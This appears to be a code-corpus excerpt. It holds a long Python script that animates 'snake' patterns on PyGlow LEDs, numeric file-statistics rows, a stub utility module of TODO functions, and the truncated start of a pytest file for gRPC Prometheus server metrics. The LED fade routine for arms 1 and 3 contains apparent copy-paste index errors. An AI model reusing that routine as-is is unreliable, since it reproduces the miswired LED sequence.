Lights up the LEDs on arms 2 and 1
"""
LOGGER.debug("Snake 21 is slithering...")
sleep_speed = 0.10
# Light up Snake 21
PYGLOW.led(7, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(1, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_12_or_21()
# Explode Snake 21
LOGGER.debug("Snake 21 is exploding...")
fizzling_snake_12_or_21()
def slithering_fizzling_fading_snake_23():
"""
Lights up the LEDs on arms 2 and 3
"""
LOGGER.debug("Snake 23 is slithering...")
sleep_speed = 0.10
# Light up Snake 23
PYGLOW.led(7, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(13, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_23_or_32()
# Explode Snake 23
LOGGER.debug("Snake 23 is exploding...")
fizzling_snake_23_or_32()
def slithering_fizzling_fading_snake_31():
"""
Lights up the LEDs on arms 3 and 1
"""
LOGGER.debug("Snake 31 is slithering...")
sleep_speed = 0.10
# Light up Snake 31
PYGLOW.led(13, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(1, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_13_or_31()
# Explode Snake 31
LOGGER.debug("Snake 31 is exploding...")
fizzling_snake_13_or_31()
def slithering_fizzling_fading_snake_32():
"""
Lights up the LEDs on arms 3 and 2
"""
LOGGER.debug("Snake 32 is slithering...")
sleep_speed = 0.10
# Light up Snake 32
PYGLOW.led(13, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(7, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_23_or_32()
# Explode Snake 32
LOGGER.debug("Snake 32 is exploding...")
fizzling_snake_23_or_32()
def fizzling_snake_12_or_21():
"""
Fades the LEDs on arms 1 and 2
"""
explode_speed = 0.01
# Fade Body 5 (on both sides)
PYGLOW.led(18, 90)
sleep(explode_speed)
PYGLOW.led(6, 90)
sleep(explode_speed)
# Fade Body 5 and 4
PYGLOW.led(18, 80)
sleep(explode_speed)
PYGLOW.led(6, 80)
sleep(explode_speed)
PYGLOW.led(11, 90)
sleep(explode_speed)
PYGLOW.led(5, 90)
# Fade Body 5 - 3
PYGLOW.led(18, 70)
sleep(explode_speed)
PYGLOW.led(6, 70)
sleep(explode_speed)
PYGLOW.led(11, 80)
sleep(explode_speed)
PYGLOW.led(5, 80)
sleep(explode_speed)
PYGLOW.led(10, 90)
sleep(explode_speed)
PYGLOW.led(4, 90)
# Fade Body 5 - 2
PYGLOW.led(18, 60)
sleep(explode_speed)
PYGLOW.led(6, 60)
sleep(explode_speed)
PYGLOW.led(11, 70)
sleep(explode_speed)
PYGLOW.led(5, 70)
sleep(explode_speed)
PYGLOW.led(10, 80)
sleep(explode_speed)
PYGLOW.led(4, 80)
sleep(explode_speed)
PYGLOW.led(9, 90)
sleep(explode_speed)
PYGLOW.led(3, 90)
# Fade Body 5 - 1
PYGLOW.led(18, 50)
sleep(explode_speed)
PYGLOW.led(6, 50)
sleep(explode_speed)
PYGLOW.led(11, 60)
sleep(explode_speed)
PYGLOW.led(5, 60)
sleep(explode_speed)
PYGLOW.led(10, 70)
sleep(explode_speed)
PYGLOW.led(4, 70)
sleep(explode_speed)
PYGLOW.led(9, 80)
sleep(explode_speed)
PYGLOW.led(3, 80)
sleep(explode_speed)
PYGLOW.led(8, 90)
sleep(explode_speed)
PYGLOW.led(2, 90)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(18, 40)
sleep(explode_speed)
PYGLOW.led(6, 40)
sleep(explode_speed)
PYGLOW.led(11, 50)
sleep(explode_speed)
PYGLOW.led(5, 50)
sleep(explode_speed)
PYGLOW.led(10, 60)
sleep(explode_speed)
PYGLOW.led(4, 60)
sleep(explode_speed)
PYGLOW.led(9, 70)
sleep(explode_speed)
PYGLOW.led(3, 70)
sleep(explode_speed)
PYGLOW.led(8, 80)
sleep(explode_speed)
PYGLOW.led(2, 80)
sleep(explode_speed)
PYGLOW.led(7, 90)
sleep(explode_speed)
PYGLOW.led(1, 90)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(18, 30)
sleep(explode_speed)
PYGLOW.led(6, 30)
sleep(explode_speed)
PYGLOW.led(11, 40)
sleep(explode_speed)
PYGLOW.led(5, 40)
sleep(explode_speed)
PYGLOW.led(10, 50)
sleep(explode_speed)
PYGLOW.led(4, 50)
sleep(explode_speed)
PYGLOW.led(9, 60)
sleep(explode_speed)
PYGLOW.led(3, 60)
sleep(explode_speed)
PYGLOW.led(8, 70)
sleep(explode_speed)
PYGLOW.led(2, 70)
sleep(explode_speed)
PYGLOW.led(7, 80)
sleep(explode_speed)
PYGLOW.led(1, 80)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(18, 20)
sleep(explode_speed)
PYGLOW.led(6, 20)
sleep(explode_speed)
PYGLOW.led(11, 30)
sleep(explode_speed)
PYGLOW.led(5, 30)
sleep(explode_speed)
PYGLOW.led(10, 40)
sleep(explode_speed)
PYGLOW.led(4, 40)
sleep(explode_speed)
PYGLOW.led(9, 50)
sleep(explode_speed)
PYGLOW.led(3, 50)
sleep(explode_speed)
PYGLOW.led(8, 60)
sleep(explode_speed)
PYGLOW.led(2, 60)
sleep(explode_speed)
PYGLOW.led(7, 70)
sleep(explode_speed)
PYGLOW.led(1, 70)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(18, 10)
sleep(explode_speed)
PYGLOW.led(6, 10)
sleep(explode_speed)
PYGLOW.led(11, 20)
sleep(explode_speed)
PYGLOW.led(5, 20)
sleep(explode_speed)
PYGLOW.led(10, 30)
sleep(explode_speed)
PYGLOW.led(4, 30)
sleep(explode_speed)
PYGLOW.led(9, 40)
sleep(explode_speed)
PYGLOW.led(3, 40)
sleep(explode_speed)
PYGLOW.led(8, 50)
sleep(explode_speed)
PYGLOW.led(2, 50)
sleep(explode_speed)
PYGLOW.led(7, 60)
sleep(explode_speed)
PYGLOW.led(1, 60)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(18, 0)
sleep(explode_speed)
PYGLOW.led(6, 0)
sleep(explode_speed)
PYGLOW.led(11, 10)
sleep(explode_speed)
PYGLOW.led(5, 10)
sleep(explode_speed)
PYGLOW.led(10, 20)
sleep(explode_speed)
PYGLOW.led(4, 20)
sleep(explode_speed)
PYGLOW.led(9, 30)
sleep(explode_speed)
PYGLOW.led(3, 30)
sleep(explode_speed)
PYGLOW.led(8, 40)
sleep(explode_speed)
PYGLOW.led(2, 40)
sleep(explode_speed)
PYGLOW.led(7, 50)
sleep(explode_speed)
PYGLOW.led(1, 50)
sleep(explode_speed)
# Fade Body 4 -1, Head and Tail
PYGLOW.led(11, 0)
sleep(explode_speed)
PYGLOW.led(5, 0)
sleep(explode_speed)
PYGLOW.led(10, 10)
sleep(explode_speed)
PYGLOW.led(4, 10)
sleep(explode_speed)
PYGLOW.led(9, 20)
sleep(explode_speed)
PYGLOW.led(3, 20)
sleep(explode_speed)
PYGLOW.led(8, 30)
sleep(explode_speed)
PYGLOW.led(2, 30)
sleep(explode_speed)
PYGLOW.led(7, 40)
sleep(explode_speed)
PYGLOW.led(1, 40)
sleep(explode_speed)
# Fade Body 3 -1, Head and Tail
PYGLOW.led(10, 0)
sleep(explode_speed)
PYGLOW.led(4, 0)
sleep(explode_speed)
PYGLOW.led(9, 10)
sleep(explode_speed)
PYGLOW.led(3, 10)
sleep(explode_speed)
PYGLOW.led(8, 20)
sleep(explode_speed)
PYGLOW.led(2, 20)
sleep(explode_speed)
PYGLOW.led(7, 30)
sleep(explode_speed)
PYGLOW.led(1, 30)
sleep(explode_speed)
# Fade Body 2 - 1, Head and Tail
PYGLOW.led(9, 0)
sleep(explode_speed)
PYGLOW.led(3, 0)
sleep(explode_speed)
PYGLOW.led(8, 10)
sleep(explode_speed)
PYGLOW.led(2, 10)
sleep(explode_speed)
PYGLOW.led(7, 20)
sleep(explode_speed)
PYGLOW.led(1, 20)
sleep(explode_speed)
# Fade Body 1, Head and Tail
PYGLOW.led(8, 0)
sleep(explode_speed)
PYGLOW.led(2, 0)
sleep(explode_speed)
PYGLOW.led(7, 10)
sleep(explode_speed)
PYGLOW.led(1, 10)
sleep(explode_speed)
# Fade Head and Tail
PYGLOW.led(7, 0)
sleep(explode_speed)
PYGLOW.led(1, 0)
sleep(explode_speed)
def fizzling_snake_13_or_31():
"""
Fades the LEDs on arms 1 and 3
"""
explode_speed = 0.01
# Fade Body 5 (on both sides)
PYGLOW.led(18, 90)
sleep(explode_speed)
PYGLOW.led(12, 90)
sleep(explode_speed)
# Fade Body 5 and 4
PYGLOW.led(18, 80)
sleep(explode_speed)
PYGLOW.led(12, 80)
sleep(explode_speed)
PYGLOW.led(17, 90)
sleep(explode_speed)
PYGLOW.led(5, 90)
# Fade Body 5 - 3
PYGLOW.led(18, 70)
sleep(explode_speed)
PYGLOW.led(12, 70)
sleep(explode_speed)
PYGLOW.led(17, 80)
sleep(explode_speed)
PYGLOW.led(5, 80)
sleep(explode_speed)
PYGLOW.led(16, 90)
sleep(explode_speed)
PYGLOW.led(4, 90)
# Fade Body 5 - 2
PYGLOW.led(18, 60)
sleep(explode_speed)
PYGLOW.led(12, 60)
sleep(explode_speed)
PYGLOW.led(17, 70)
sleep(explode_speed)
PYGLOW.led(5, 70)
sleep(explode_speed)
PYGLOW.led(16, 80)
sleep(explode_speed)
PYGLOW.led(4, 80)
sleep(explode_speed)
PYGLOW.led(15, 90)
sleep(explode_speed)
PYGLOW.led(3, 90)
# Fade Body 5 - 1
PYGLOW.led(18, 50)
sleep(explode_speed)
PYGLOW.led(12, 50)
sleep(explode_speed)
PYGLOW.led(17, 60)
sleep(explode_speed)
PYGLOW.led(5, 60)
sleep(explode_speed)
PYGLOW.led(16, 70)
sleep(explode_speed)
PYGLOW.led(4, 70)
sleep(explode_speed)
PYGLOW.led(15, 80)
sleep(explode_speed)
PYGLOW.led(3, 80)
sleep(explode_speed)
PYGLOW.led(14, 90)
sleep(explode_speed)
PYGLOW.led(2, 90)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(18, 40)
sleep(explode_speed)
PYGLOW.led(12, 40)
sleep(explode_speed)
PYGLOW.led(17, 50)
sleep(explode_speed)
PYGLOW.led(5, 50)
sleep(explode_speed)
PYGLOW.led(16, 60)
sleep(explode_speed)
PYGLOW.led(4, 60)
sleep(explode_speed)
PYGLOW.led(15, 70)
sleep(explode_speed)
PYGLOW.led(3, 70)
sleep(explode_speed)
PYGLOW.led(4, 80)
sleep(explode_speed)
PYGLOW.led(2, 80)
sleep(explode_speed)
PYGLOW.led(3, 90)
sleep(explode_speed)
PYGLOW.led(1, 90)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(18, 30)
sleep(explode_speed)
PYGLOW.led(12, 30)
sleep(explode_speed)
PYGLOW.led(17, 40)
sleep(explode_speed)
PYGLOW.led(5, 40)
sleep(explode_speed)
PYGLOW.led(16, 50)
sleep(explode_speed)
PYGLOW.led(4, 50)
sleep(explode_speed)
PYGLOW.led(15, 60)
sleep(explode_speed)
PYGLOW.led(3, 60)
sleep(explode_speed)
PYGLOW.led(14, 70)
sleep(explode_speed)
PYGLOW.led(2, 70)
sleep(explode_speed)
PYGLOW.led(13, 80)
sleep(explode_speed)
PYGLOW.led(1, 80)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(18, 20)
sleep(explode_speed)
PYGLOW.led(2, 20)
sleep(explode_speed)
PYGLOW.led(17, 30)
sleep(explode_speed)
PYGLOW.led(5, 30)
sleep(explode_speed)
PYGLOW.led(16, 40)
sleep(explode_speed)
PYGLOW.led(4, 40)
sleep(explode_speed)
PYGLOW.led(15, 50)
sleep(explode_speed)
PYGLOW.led(3, 50)
sleep(explode_speed)
PYGLOW.led(14, 60)
sleep(explode_speed)
PYGLOW.led(2, 60)
sleep(explode_speed)
PYGLOW.led(13, 70)
sleep(explode_speed)
PYGLOW.led(1, 70)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(18, 10)
sleep(explode_speed)
PYGLOW.led(12, 10)
sleep(explode_speed)
PYGLOW.led(17, 20)
sleep(explode_speed)
PYGLOW.led(5, 20)
sleep(explode_speed)
PYGLOW.led(16, 30)
sleep(explode_speed)
PYGLOW.led(4, 30)
sleep(explode_speed)
PYGLOW.led(15, 40)
sleep(explode_speed)
PYGLOW.led(3, 40)
sleep(explode_speed)
PYGLOW.led(14, 50)
sleep(explode_speed)
PYGLOW.led(2, 50)
sleep(explode_speed)
PYGLOW.led(3, 60)
sleep(explode_speed)
PYGLOW.led(1, 60)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(18, 0)
sleep(explode_speed)
PYGLOW.led(12, 0)
sleep(explode_speed)
PYGLOW.led(17, 10)
sleep(explode_speed)
PYGLOW.led(5, 10)
sleep(explode_speed)
PYGLOW.led(16, 20)
sleep(explode_speed)
PYGLOW.led(4, 20)
sleep(explode_speed)
PYGLOW.led(15, 30)
sleep(explode_speed)
PYGLOW.led(3, 30)
sleep(explode_speed)
PYGLOW.led(14, 40)
sleep(explode_speed)
PYGLOW.led(2, 40)
sleep(explode_speed)
PYGLOW.led(13, 50)
sleep(explode_speed)
PYGLOW.led(1, 50)
sleep(explode_speed)
# Fade Body 4 -1, Head and Tail
PYGLOW.led(17, 0)
sleep(explode_speed)
PYGLOW.led(5, 0)
sleep(explode_speed)
PYGLOW.led(16, 10)
sleep(explode_speed)
PYGLOW.led(4, 10)
sleep(explode_speed)
PYGLOW.led(15, 20)
sleep(explode_speed)
PYGLOW.led(3, 20)
sleep(explode_speed)
PYGLOW.led(14, 30)
sleep(explode_speed)
PYGLOW.led(2, 30)
sleep(explode_speed)
PYGLOW.led(13, 40)
sleep(explode_speed)
PYGLOW.led(1, 40)
sleep(explode_speed)
# Fade Body 3 -1, Head and Tail
PYGLOW.led(16, 0)
sleep(explode_speed)
PYGLOW.led(4, 0)
sleep(explode_speed)
PYGLOW.led(15, 10)
sleep(explode_speed)
PYGLOW.led(3, 10)
sleep(explode_speed)
PYGLOW.led(14, 20)
sleep(explode_speed)
PYGLOW.led(2, 20)
sleep(explode_speed)
PYGLOW.led(13, 30)
sleep(explode_speed)
PYGLOW.led(1, 30)
sleep(explode_speed)
# Fade Body 2 - 1, Head and Tail
PYGLOW.led(15, 0)
sleep(explode_speed)
PYGLOW.led(3, 0)
sleep(explode_speed)
PYGLOW.led(14, 10)
sleep(explode_speed)
PYGLOW.led(2, 10)
sleep(explode_speed)
PYGLOW.led(13, 20)
sleep(explode_speed)
PYGLOW.led(1, 20)
sleep(explode_speed)
# Fade Body 1, Head and Tail
PYGLOW.led(14, 0)
sleep(explode_speed)
PYGLOW.led(2, 0)
sleep(explode_speed)
PYGLOW.led(13, 10)
sleep(explode_speed)
PYGLOW.led(1, 10)
sleep(explode_speed)
# Fade Head and Tail
PYGLOW.led(13, 0)
sleep(explode_speed)
PYGLOW.led(1, 0)
sleep(explode_speed)
def fizzling_snake_23_or_32():
"""
Fades the LEDs on arms 2 and 3
"""
explode_speed = 0.01
# Fade Body 5 (on both sides)
PYGLOW.led(12, 90)
sleep(explode_speed)
PYGLOW.led(6, 90)
sleep(explode_speed)
# Fade Body 5 and 4
PYGLOW.led(12, 80)
sleep(explode_speed)
PYGLOW.led(6, 80)
sleep(explode_speed)
PYGLOW.led(17, 90)
sleep(explode_speed)
PYGLOW.led(11, 90)
# Fade Body 5 - 3
PYGLOW.led(12, 70)
sleep(explode_speed)
PYGLOW.led(6, 70)
sleep(explode_speed)
PYGLOW.led(17, 80)
sleep(explode_speed)
PYGLOW.led(11, 80)
sleep(explode_speed)
PYGLOW.led(16, 90)
sleep(explode_speed)
PYGLOW.led(10, 90)
# Fade Body 5 - 2
PYGLOW.led(12, 60)
sleep(explode_speed)
PYGLOW.led(6, 60)
sleep(explode_speed)
PYGLOW.led(17, 70)
sleep(explode_speed)
PYGLOW.led(11, 70)
sleep(explode_speed)
PYGLOW.led(16, 80)
sleep(explode_speed)
PYGLOW.led(10, 80)
sleep(explode_speed)
PYGLOW.led(15, 90)
sleep(explode_speed)
PYGLOW.led(9, 90)
# Fade Body 5 - 1
PYGLOW.led(12, 50)
sleep(explode_speed)
PYGLOW.led(6, 50)
sleep(explode_speed)
PYGLOW.led(17, 60)
sleep(explode_speed)
PYGLOW.led(11, 60)
sleep(explode_speed)
PYGLOW.led(16, 70)
sleep(explode_speed)
PYGLOW.led(10, 70)
sleep(explode_speed)
PYGLOW.led(15, 80)
sleep(explode_speed)
PYGLOW.led(9, 80)
sleep(explode_speed)
PYGLOW.led(14, 90)
sleep(explode_speed)
PYGLOW.led(8, 90)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(12, 40)
sleep(explode_speed)
PYGLOW.led(6, 40)
sleep(explode_speed)
PYGLOW.led(17, 50)
sleep(explode_speed)
PYGLOW.led(11, 50)
sleep(explode_speed)
PYGLOW.led(16, 60)
sleep(explode_speed)
PYGLOW.led(10, 60)
sleep(explode_speed)
PYGLOW.led(15, 70)
sleep(explode_speed)
PYGLOW.led(9, 70)
sleep(explode_speed)
PYGLOW.led(14, 80)
sleep(explode_speed)
PYGLOW.led(8, 80)
sleep(explode_speed)
PYGLOW.led(13, 90)
sleep(explode_speed)
PYGLOW.led(7, 90)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(12, 30)
sleep(explode_speed)
PYGLOW.led(6, 30)
sleep(explode_speed)
PYGLOW.led(17, 40)
sleep(explode_speed)
PYGLOW.led(11, 40)
sleep(explode_speed)
PYGLOW.led(16, 50)
sleep(explode_speed)
PYGLOW.led(10, 50)
sleep(explode_speed)
PYGLOW.led(15, 60)
sleep(explode_speed)
PYGLOW.led(9, 60)
sleep(explode_speed)
PYGLOW.led(14, 70)
sleep(explode_speed)
PYGLOW.led(8, 70)
sleep(explode_speed)
PYGLOW.led(13, 80)
sleep(explode_speed)
PYGLOW.led(7, 80)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(12, 20)
sleep(explode_speed)
PYGLOW.led(6, 20)
sleep(explode_speed)
PYGLOW.led(17, 30)
sleep(explode_speed)
PYGLOW.led(11, 30)
sleep(explode_speed)
PYGLOW.led(16, 40)
sleep(explode_speed)
PYGLOW.led(10, 40)
sleep(explode_speed)
PYGLOW.led(15, 50)
sleep(explode_speed)
PYGLOW.led(9, 50)
sleep(explode_speed)
PYGLOW.led(14, 60)
sleep(explode_speed)
PYGLOW.led(8, 60)
sleep(explode_speed)
PYGLOW.led(13, 70)
sleep(explode_speed)
PYGLOW.led(7, 70)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(12, 10)
sleep(explode_speed)
PYGLOW.led(6, 10)
sleep(explode_speed)
PYGLOW.led(17, 20)
sleep(explode_speed)
PYGLOW.led(11, 20)
sleep(explode_speed)
PYGLOW.led(16, 30)
sleep(explode_speed)
PYGLOW.led(10, 30)
sleep(explode_speed)
PYGLOW.led(15, 40)
sleep(explode_speed)
PYGLOW.led(9, 40)
sleep(explode_speed)
PYGLOW.led(14, 50)
sleep(explode_speed)
PYGLOW.led(8, 50)
sleep(explode_speed)
PYGLOW.led(13, 60)
sleep(explode_speed)
PYGLOW.led(7, 60)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(12, 0)
sleep(explode_speed)
PYGLOW.led(6, 0)
sleep(explode_speed)
PYGLOW.led(17, 10)
sleep(explode_speed)
PYGLOW.led(11, 10)
sleep(explode_speed)
PYGLOW.led(16, 20)
sleep(explode_speed)
PYGLOW.led(10, 20)
sleep(explode_speed)
PYGLOW.led(15, 30)
sleep(explode_speed)
PYGLOW.led(9, 30)
sleep(explode_speed)
PYGLOW.led(14, 40)
sleep(explode_speed)
PYGLOW.led(8, 40)
sleep(explode_speed)
PYGLOW.led(13, 50)
sleep(explode_speed)
PYGLOW.led(7, 50)
sleep(explode_speed)
# Fade Body 4 -1, Head and Tail
PYGLOW.led(17, 0)
sleep(explode_speed)
PYGLOW.led(11, 0)
sleep(explode_speed)
PYGLOW.led(16, 10)
sleep(explode_speed)
PYGLOW.led(10, 10)
sleep(explode_speed)
PYGLOW.led(15, 20)
sleep(explode_speed)
PYGLOW.led(9, 20)
sleep(explode_speed)
PYGLOW.led(14, 30)
sleep(explode_speed)
PYGLOW.led(8, 30)
sleep(explode_speed)
PYGLOW.led(13, 40)
sleep(explode_speed)
PYGLOW.led(7, 40)
sleep(explode_speed)
# Fade Body 3 -1, Head and Tail
PYGLOW.led(16, 0)
sleep(explode_speed)
PYGLOW.led(10, 0)
sleep(explode_speed)
PYGLOW.led(15, 10)
sleep(explode_speed)
PYGLOW.led(9, 10)
sleep(explode_speed)
PYGLOW.led(14, 20)
sleep(explode_speed)
PYGLOW.led(8, 20)
sleep(explode_speed)
PYGLOW.led(13, 30)
sleep(explode_speed)
PYGLOW.led(7, 30)
sleep(explode_speed)
# Fade Body 2 - 1, Head and Tail
PYGLOW.led(15, 0)
sleep(explode_speed)
PYGLOW.led(9, 0)
sleep(explode_speed)
PYGLOW.led(14, 10)
sleep(explode_speed)
PYGLOW.led(8, 10)
sleep(explode_speed)
PYGLOW.led(13, 20)
sleep(explode_speed)
PYGLOW.led(7, 20)
sleep(explode_speed)
# Fade Body 1, Head and Tail
PYGLOW.led(14, 0)
sleep(explode_speed)
PYGLOW.led(8, 0)
sleep(explode_speed)
PYGLOW.led(13, 10)
sleep(explode_speed)
PYGLOW.led(7, 10)
sleep(explode_speed)
# Fade Head and Tail
PYGLOW.led(13, 0)
sleep(explode_speed)
PYGLOW.led(7, 0)
sleep(explode_speed)
def main():
"""
The main function
"""
LOGGER.debug("START")
snake_functions = [snake_12, snake_13, snake_23, fading_snake_12,
fading_snake_13, fading_snake_23, slithering_snake_12,
slithering_snake_13, slithering_snake_21,
slithering_snake_23, slithering_snake_31,
slithering_snake_32, slithering_fading_snake_12,
slithering_fading_snake_13, slithering_fading_snake_21,
slithering_fading_snake_23, slithering_fading_snake_31,
slithering_fading_snake_32, pulsing_snake_12,
pulsing_snake_13, pulsing_snake_23, exploding_snake_12,
exploding_snake_13, exploding_snake_23,
slithering_exploding_snake_12,
slithering_exploding_snake_13,
slithering_exploding_snake_21,
slithering_exploding_snake_23,
slithering_exploding_snake_31,
slithering_exploding_snake_32,
slithering_fizzling_fading_snake_12,
slithering_fizzling_fading_snake_13,
slithering_fizzling_fading_snake_21,
slithering_fizzling_fading_snake_23,
slithering_fizzling_fading_snake_31,
slithering_fizzling_fading_snake_32]
while True:
random.choice(snake_functions)()
sleep(2)
if __name__ == '__main__':
try:
# STEP01: Check if Log directory exists.
check_log_directory()
# STEP02: Enable logging
LOG = 'Logs/random_snakes.log'
LOG_FORMAT = '%(asctime)s %(name)s: %(funcName)s: \
%(levelname)s: %(message)s'
LOGGER = logging.getLogger(__name__)
# Nothing will log unless logging level is changed to DEBUG
LOGGER.setLevel(logging.ERROR)
FORMATTER = logging.Formatter(fmt=LOG_FORMAT,
datefmt='%m/%d/%y %I:%M:%S %p:')
FILE_HANDLER = logging.FileHandler(LOG, 'w')
FILE_HANDLER.setFormatter(FORMATTER)
LOGGER.addHandler(FILE_HANDLER)
# STEP03: Print header
print_header()
# STEP04: Print instructions in white text
print("\033[1;37;40mPress Ctrl-C to stop the program.")
# STEP05: Run the main function
main()
except KeyboardInterrupt:
delete_empty_logs(LOG)
stop()
| 23.746572 | 79 | 0.624385 | 15,973 | 103,915 | 3.916234 | 0.012396 | 0.239121 | 0.306839 | 0.332353 | 0.972568 | 0.966525 | 0.961681 | 0.957173 | 0.955015 | 0.951786 | 0 | 0.099022 | 0.25237 | 103,915 | 4,375 | 80 | 23.752 | 0.706153 | 0.117009 | 0 | 0.954906 | 0 | 0 | 0.014432 | 0.000244 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012572 | false | 0 | 0.002186 | 0 | 0.014758 | 0.00082 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
cca5a7d49a7e41a6dbea4effdd7657195c648384 | 113 | py | Python | utility/utility.py | ericlee0803/surrogate-GCP | 0d04355bf17dc330b383353b51a62a28276de063 | [
"BSD-3-Clause"
] | null | null | null | utility/utility.py | ericlee0803/surrogate-GCP | 0d04355bf17dc330b383353b51a62a28276de063 | [
"BSD-3-Clause"
] | null | null | null | utility/utility.py | ericlee0803/surrogate-GCP | 0d04355bf17dc330b383353b51a62a28276de063 | [
"BSD-3-Clause"
] | null | null | null | def utility(list):
pass #TODO
def getinitState():
pass #TODO
def getnextStates(state):
pass #TODO
| 11.3 | 26 | 0.654867 | 14 | 113 | 5.285714 | 0.571429 | 0.324324 | 0.297297 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.238938 | 113 | 9 | 27 | 12.555556 | 0.860465 | 0.106195 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 0 | 1 | 0.5 | false | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
ccc9a92bbd684ac4e87d840a72f86dbf61ebf7dc | 3,173 | py | Python | tests/py_grpc_prometheus/test_grpc_server_interceptor_exception.py | RyanSiu1995/py-grpc-prometheus | eb9dee1f0a4e57cef220193ee48021dc9a9f3d82 | [
"Apache-2.0"
] | 40 | 2018-12-05T15:35:52.000Z | 2022-01-31T09:02:12.000Z | tests/py_grpc_prometheus/test_grpc_server_interceptor_exception.py | RyanSiu1995/py-grpc-prometheus | eb9dee1f0a4e57cef220193ee48021dc9a9f3d82 | [
"Apache-2.0"
] | 12 | 2019-08-06T12:14:20.000Z | 2021-08-09T14:53:37.000Z | tests/py_grpc_prometheus/test_grpc_server_interceptor_exception.py | RyanSiu1995/py-grpc-prometheus | eb9dee1f0a4e57cef220193ee48021dc9a9f3d82 | [
"Apache-2.0"
] | 9 | 2019-12-18T08:49:37.000Z | 2022-03-30T17:08:15.000Z | from unittest.mock import patch
import pytest
import grpc
from tests.py_grpc_prometheus.utils import get_server_metric
from tests.integration.hello_world import hello_world_pb2
@pytest.mark.parametrize("target_count", [1, 10, 100])
def test_grpc_server_handled_with_server_error(
target_count, grpc_server, grpc_stub
): # pylint: disable=unused-argument
for _ in range(target_count):
with pytest.raises(grpc.RpcError):
grpc_stub.SayHello(hello_world_pb2.HelloRequest(name="unknownError"))
target_metric = get_server_metric("grpc_server_handled")
assert target_metric.samples == []
@pytest.mark.parametrize("target_count", [1, 10, 100])
def test_grpc_server_handled_with_rpc_error(
target_count, grpc_server, grpc_stub
): # pylint: disable=unused-argument
for _ in range(target_count):
with pytest.raises(grpc.RpcError):
grpc_stub.SayHello(hello_world_pb2.HelloRequest(name="rpcError"))
target_metric = get_server_metric("grpc_server_handled")
assert target_metric.samples[0].value == target_count
@pytest.mark.parametrize("target_count", [1, 10, 100])
def test_grpc_server_handled_with_interceptor_error(
target_count, grpc_server, grpc_stub
): # pylint: disable=unused-argument
for _ in range(target_count):
